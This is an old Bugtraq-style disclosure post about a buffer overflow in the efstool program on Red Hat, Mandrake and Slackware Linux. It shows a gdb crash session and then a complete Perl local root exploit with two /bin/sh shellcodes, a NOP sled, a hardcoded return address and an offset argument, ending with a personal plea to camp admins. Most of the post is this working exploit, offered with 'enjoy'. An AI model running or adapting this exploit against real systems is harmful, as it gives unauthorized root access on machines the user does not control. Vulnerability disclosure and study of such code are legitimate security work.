efstool local root exploit

[<clorox () ptrace-networks net>]

 Ptrace Networks Security
--------------------------

An error in the efstool program on redhat, mandrake, and slackware
is able to be successfully exploited through a buffer overflow.

[clorox@ptnw clorox]$ efstool `perl -e 'print "A" x 3000'`
Segmentation fault
[clorox@ptnw clorox]$ gdb efstool
GNU gdb 5.1.1
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you 
are
welcome to change it and/or distribute copies of it under certain 
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-mandrake-linux"...(no debugging symbols 
found)...
(gdb) r `perl -e 'print "A" x 3000'`
Starting program: /usr/bin/efstool `perl -e 'print "A" x 3000'`
(no debugging symbols found)...(no debugging symbols found)...(no 
debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg esp
esp            0xbfffe890    0xbfffe890
(gdb)


example:
#!/usr/bin/perl
# efstool root exploit
# written by clorox of Ptrac Networks for BKACC(Bored Kids At ComputerCamp)
# give the campers internet grogan!
#
# tested to work on slackware 8, mandrake 8, mandrake 7.1
# tweaks may be needed on the offset
# method 1 works more often but
# method 2 is faster but not too good
#
#
# enjoy -clorox
# perl efs.pl -1000

$shellcode =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
"\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
"\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
"\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
"/bin/sh";

$shellcode2 =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88".
"\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3".
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31".
"\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
"\xff\xff/bin/sh";

$ret = "0xbfffe890";
$offset = $ARGV[0];
$nop = "\x90";

if ($ARGV[1] eq "m1") {
        $len = 3000;
        for ($i = 0; $i < ($len - length($shellcode)); $i++) {
                $buffer .= $nop;
        }
        $buffer .= $shellcode;
} elsif ($ARGV[1] eq "m2") {
        $len = 10010;
        for ($i = 0; $i < ($len - length($shellcode)); $i++) {
                $buffer .= $nop;
        }
        $buffer .= $shellcode2;
} else {
        print "You must specify a method fool!\n";
        print "perl $0 <offset> m1 or m2\n";
}

$buffer .= pack('l', ($ret + $offset));
$buffer .= pack('l', ($ret + $offset));
exec("efstool $buffer");
# and on the seventh day clorox said "LET THERE BE SHELL!"

and on a personal note,
grogan, or any other admins of ceboston, the campers here deserve internet 
in our rooms, the computer labs arent condusive to doing research. as you 
can see we would use it for positive things such as posting to bug traq if 
you read this and want to talk it over talk to me im in room 105 in new 
dorm.

-max